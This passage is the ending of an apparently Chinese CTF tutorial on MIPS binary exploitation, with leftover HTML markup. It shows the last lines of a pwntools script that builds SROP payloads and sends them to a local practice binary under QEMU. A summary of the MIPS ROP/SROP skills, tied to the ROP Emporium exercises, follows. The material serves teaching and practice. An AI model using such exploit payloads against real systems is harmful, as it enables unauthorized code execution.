<\/span><\/span>payload2 +=<\/span> p32(0x004005A0<\/span>)  # syscall指令地址<\/span>
<\/span><\/span>payload2 +=<\/span> bytes(frame2)
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/mipsssh'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload1)
<\/span><\/span>p.<\/span>sendline(payload2)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>总结<\/h2>
MIPS架构下的Pwn技术要点：<\/p>

理解MIPS架构特点：固定指令长度、加载\/存储架构、延迟槽等<\/li>
掌握MIPS寄存器用途和调用约定<\/li>
熟悉MIPS栈帧结构和函数调用过程<\/li>
掌握MIPS ROP构造技巧，特别是参数传递和跳转控制<\/li>
学会使用SROP等高级ROP技术<\/li>
熟练使用QEMU模拟和调试MIPS程序<\/li>
<\/ol>
通过ROP Emporium的8个练习，可以系统掌握MIPS ROP的各种技巧，从简单到复杂逐步提升。<\/p>